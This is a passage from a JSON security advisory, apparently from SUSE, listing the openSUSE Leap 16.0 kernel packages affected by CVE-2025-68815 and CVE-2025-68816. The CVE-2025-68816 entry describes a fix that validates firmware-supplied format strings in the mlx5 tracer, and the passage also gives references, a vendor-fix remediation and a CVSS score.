"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
